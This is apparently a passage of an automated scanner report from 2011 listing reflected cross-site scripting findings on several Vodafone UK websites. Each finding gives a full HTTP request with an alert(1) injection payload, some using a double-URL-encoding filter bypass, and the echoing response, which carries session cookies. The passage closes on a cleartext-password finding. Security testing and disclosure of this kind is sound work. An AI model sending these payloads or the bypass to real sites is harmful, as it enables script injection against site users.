Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Nov 2011 18:42:09 GMT
Server: Apache
Set-Cookie: LiSESSIONID=C9E54BCEC952F002C704288DFC3B451A; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 70555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <title> Node 72f2993</title><script>alert(1)</script>03530ed17d7 was Not Found - Vodafone eForum</title>
...[SNIP]...

1.15. http://forum.vodafone.co.uk/t5/Apple/bd-p/72 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/Apple/bd-p/72

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a6381%253cscript%253ealert%25281%2529%253c%252fscript%253ef5cffca84a1 was submitted in the REST URL parameter 4. This input was echoed as a6381<script>alert(1)</script>f5cffca84a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /t5/Apple/bd-p/72a6381%253cscript%253ealert%25281%2529%253c%252fscript%253ef5cffca84a1 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Nov 2011 18:42:09 GMT
Server: Apache
Set-Cookie: LiSESSIONID=8E9CE649A48AE72AEDCACC83552B0644; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 70523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <title> Node 72a6381
...[SNIP]...
<span class="lia-link-navigation lia-link-disabled" id="link">Node 72a6381<script>alert(1)</script>f5cffca84a1 was Not Found</span>
...[SNIP]...

1.16. http://forum.vodafone.co.uk/t5/BlackBerry/bd-p/50 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/BlackBerry/bd-p/50

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 7059e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef79c91e038a was submitted in the REST URL parameter 4. This input was echoed as 7059e</title><script>alert(1)</script>f79c91e038a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /t5/BlackBerry/bd-p/507059e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef79c91e038a HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Nov 2011 18:42:09 GMT
Server: Apache
Set-Cookie: LiSESSIONID=20DC1DEEC6CD34FBB3F1E33AC4B463D2; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 70555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <title> Node 507059e</title><script>alert(1)</script>f79c91e038a was Not Found - Vodafone eForum</title>
...[SNIP]...

1.17. http://forum.vodafone.co.uk/t5/BlackBerry/bd-p/50 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/BlackBerry/bd-p/50

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 65457%253cscript%253ealert%25281%2529%253c%252fscript%253ed1fbc0ea50d was submitted in the REST URL parameter 4. This input was echoed as 65457<script>alert(1)</script>d1fbc0ea50d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /t5/BlackBerry/bd-p/5065457%253cscript%253ealert%25281%2529%253c%252fscript%253ed1fbc0ea50d HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Nov 2011 18:42:09 GMT
Server: Apache
Set-Cookie: LiSESSIONID=876C2BA77ACCC14A9DF09D9AA4BD6449; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 70523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <title> Node 5065457
...[SNIP]...
<span class="lia-link-navigation lia-link-disabled" id="link">Node 5065457<script>alert(1)</script>d1fbc0ea50d was Not Found</span>
...[SNIP]...

1.18. http://forum.vodafone.co.uk/t5/HTC/bd-p/htc [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/HTC/bd-p/htc

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57765%253cscript%253ealert%25281%2529%253c%252fscript%253e416b82754ac was submitted in the REST URL parameter 4. This input was echoed as 57765<script>alert(1)</script>416b82754ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /t5/HTC/bd-p/htc57765%253cscript%253ealert%25281%2529%253c%252fscript%253e416b82754ac HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Nov 2011 18:42:09 GMT
Server: Apache
Set-Cookie: LiSESSIONID=5121B26ABE7863CCBFD816F363DCCA58; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 70527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <title> Node htc5776
...[SNIP]...
<span class="lia-link-navigation lia-link-disabled" id="link">Node htc57765<script>alert(1)</script>416b82754ac was Not Found</span>
...[SNIP]...

1.19. http://forum.vodafone.co.uk/t5/HTC/bd-p/htc [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/HTC/bd-p/htc

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 9f80f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3b7b161d260 was submitted in the REST URL parameter 4. This input was echoed as 9f80f</title><script>alert(1)</script>3b7b161d260 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /t5/HTC/bd-p/htc9f80f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3b7b161d260 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Nov 2011 18:42:10 GMT
Server: Apache
Set-Cookie: LiSESSIONID=2F62343D3650DB733D2B436B1460163E; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 70559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <title> Node htc9f80f</title><script>alert(1)</script>3b7b161d260 was Not Found - Vodafone eForum</title>
...[SNIP]...

1.20. http://forum.vodafone.co.uk/t5/Vodafone-Sure-Signal/bd-p/70 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/Vodafone-Sure-Signal/bd-p/70

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 86b5d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e809bacc15fc was submitted in the REST URL parameter 4. This input was echoed as 86b5d</title><script>alert(1)</script>809bacc15fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /t5/Vodafone-Sure-Signal/bd-p/7086b5d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e809bacc15fc HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Nov 2011 18:42:10 GMT
Server: Apache
Set-Cookie: LiSESSIONID=07CA732C5C5D42E6A7791BA8FE22481A; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 70555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <title> Node 7086b5d</title><script>alert(1)</script>809bacc15fc was Not Found - Vodafone eForum</title>
...[SNIP]...

1.21. http://forum.vodafone.co.uk/t5/Vodafone-Sure-Signal/bd-p/70 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/Vodafone-Sure-Signal/bd-p/70

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4c16b%253cscript%253ealert%25281%2529%253c%252fscript%253ebfae6efd4c6 was submitted in the REST URL parameter 4. This input was echoed as 4c16b<script>alert(1)</script>bfae6efd4c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /t5/Vodafone-Sure-Signal/bd-p/704c16b%253cscript%253ealert%25281%2529%253c%252fscript%253ebfae6efd4c6 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Nov 2011 18:42:10 GMT
Server: Apache
Set-Cookie: LiSESSIONID=E22E95123329A40A3EF81F1D3AF6A3B9; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 70523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <title> Node 704c16b
...[SNIP]...
<span class="lia-link-navigation lia-link-disabled" id="link">Node 704c16b<script>alert(1)</script>bfae6efd4c6 was Not Found</span>
...[SNIP]...

1.22. https://freesim.vodafone.co.uk/orders/add [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://freesim.vodafone.co.uk
Path:	/orders/add

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4987"><a>2534d8215ae was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /orders/add?package_id=4&tracker=y9v09n&keyword=weekendd4987"><a>2534d8215ae&icmp=int-vod-frbee-frwend-cta HTTP/1.1
Host: freesim.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.8
Set-Cookie: ci_csrf_token=dd84c0b9cbdc9fee5188ae42ba617736; expires=Fri, 18-Nov-2011 20:42:38 GMT; path=/
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%224bbae6314fafd19c2f713147a2aac21f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321641758%3B%7D5868556a3f86da8aea60b3078a3ac3e5; expires=Fri, 18-Nov-2011 19:42:38 GMT; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48834

<!DOCTYPE html>


<!--[if IE 8 ]> <html lang="en" class="no-js ie
...[SNIP]...
<input type="hidden" name="keyword" value="weekendd4987"><a>2534d8215ae" />
...[SNIP]...

1.23. http://help.vodafone.co.uk/system/selfservice.controller [CMD2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The value of the CMD2 request parameter is copied into the HTML document as text between TITLE tags. The payload 6134a</title><script>alert(1)</script>a8f5c8c6385 was submitted in the CMD2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=search6134a</title><script>alert(1)</script>a8f5c8c6385&PARTITION_ID=1&CONFIGURATION=1000&helpSearchAlpha=htc+sony HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&PARTITION_ID=1&CONFIGURATION=1058&SIDE_LINK_TOPIC_ID=9849&TOPIC_ID=9849&TOPIC_TYPE=0&STARTING_ID=0&TOPIC_NAME=Sony%20Ericsson&PARENT_TOPIC_ID=-1&PARENT_TOPIC_TYPE=0&SOURCE_FORM=BROWSE_TOPIC
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644560406%3B%20s_invisit%3Dtrue%7C1321644561166%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644561279%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20s_sq%3Dvodafonegroupukprod%253D%252526pid%25253Dhel%2525253ASony%25252520Ericsson%25252520-%25252520Help%25252520-%25252520Vodafone%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Nov 2011 19:06:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: private
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding, User-Agent
Content-Length: 60870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<title>
Help - Vodafone search6134a</title><script>alert(1)</script>a8f5c8c6385
</title>
...[SNIP]...

1.24. https://help.vodafone.co.uk/system/selfservice.controller [CMD2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The value of the CMD2 request parameter is copied into the HTML document as text between TITLE tags. The payload 34305</title><script>alert(1)</script>77994cf3a02 was submitted in the CMD2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305</title><script>alert(1)</script>77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000 HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&PARTITION_ID=1&CONFIGURATION=1000&SIDE_LINK_TOPIC_ID=1009&TOPIC_ID=1009&TOPIC_TYPE=0&STARTING_ID=0&TOPIC_NAME=Going%20abroad%20&PARENT_TOPIC_ID=-1&PARENT_TOPIC_TYPE=0&SOURCE_FORM=BROWSE_TOPIC
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=y1TnTGqLtm1BsvXyTPM3zsVTQJhzW4D3Qvskgn1GzLmHXtM2k1Bx!656056821; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Nov 2011 19:05:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: private
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<title>
Help - Vodafone contactus34305</title><script>alert(1)</script>77994cf3a02
</title>
...[SNIP]...

1.25. http://online.vodafone.co.uk/dispatch/Portal/appmanager/vodafone/wrp [searchQuery parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://online.vodafone.co.uk
Path:	/dispatch/Portal/appmanager/vodafone/wrp

Issue detail

The value of the searchQuery request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82093'%3balert(1)//1f4ef15b9e2aa894d was submitted in the searchQuery parameter. This input was echoed as 82093';alert(1)//1f4ef15b9e2aa894d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /dispatch/Portal/appmanager/vodafone/wrp?_nfpb=true&_pageLabel=Page_Search_searchResult&pageID=PSE_0001&searchQuery=press+relese+contact82093'%3balert(1)//1f4ef15b9e2aa894d&top-search.x=0&top-search.y=0&top-search=Search HTTP/1.1
Host: online.vodafone.co.uk
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://mediacentre.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mediacentre.vodafone.co.uk/index.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:32:58 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 58078
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...

...[SNIP]...

1.26. http://troubleshootinghelp.vodafone.co.uk/system/selfservice.controller [CB parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://troubleshootinghelp.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The value of the CB request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e99c"><script>alert(1)</script>ecc82bffe6f was submitted in the CB parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /system/selfservice.controller?CONFIGURATION=1005&PARTITION_ID=1&secureFlag=false&CMD=iStartSearch&USERTYPE=1&CB=10000000016e99c"><script>alert(1)</script>ecc82bffe6f&FI=1&LANGUAGE=en&COUNTRY=us HTTP/1.1
Host: troubleshootinghelp.vodafone.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://troubleshootinghelp.vodafone.co.uk/system/selfservice.controller?CONFIGURATION=1005&PARTITION_ID=1&secureFlag=false&CMD=iStartSearch&USERTYPE=1&CB=1000000001&FI=1&LANGUAGE=en&COUNTRY=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USERTYPE=1; lang_coun_conf#1005=en_us; s_vi=[CS]v1|2763522B851D1864-60000107601A8EC3[CE]; mbox=check#true#1321641123|session#1321641039287-389573#1321642923|PC#1321641039287-389573.19#1322850667; s_pers=%20s_lastvisit%3D1321641041755%7C1416249041755%3B%20s_vnum%3D1324233041761%2526vn%253D1%7C1324233041761%3B%20dl%3D1%7C1321642874952%3B%20s_nr%3D1321641074957%7C1324233074957%3B%20s_invisit%3Dtrue%7C1321642874962%3B%20gpv_p32%3DUK%253APersonal%7C1321642874965%3B; s_sv_122_s1=1@16@a//1321641043212; s_sv_122_p1=1@49@d/25246/25245/25244/25243&s/25247/19337/26945&e/3; s_sess=%20s_scount%3D1%3B%20s_stack%3D1%253Apress%2520relese%2520contact%3B%20s_sv_sid%3D709713783754%3B%20ev1%3Dpress%2520relese%2520contact%3B%20s_cc%3Dtrue%3B%20s_cmrun%3D1%3B%20s_sq%3D%3B%20s_ppv%3D57%3B; JSESSIONID=724EDA0046968D28F8FE0D6590E6DAEC; web_templates_personalization_cookie#1005#1=

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Fri, 18 Nov 2011 18:34:13 GMT
Pragma: private
Content-Type: text/html;charset=UTF8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
Set-Cookie: USERTYPE=1
Vary: Accept-Encoding
Content-Length: 46921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">



...[SNIP]...
<input type="hidden" name="CB" value="10000000016e99c"><script>alert(1)</script>ecc82bffe6f"/>
...[SNIP]...

2. Cleartext submission of password previous next
There are 5 instances of this issue:

/
/t5/Apple/bd-p/72
/t5/BlackBerry/bd-p/50
/t5/HTC/bd-p/htc
/t5/Vodafone-Sure-Signal/bd-p/70

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

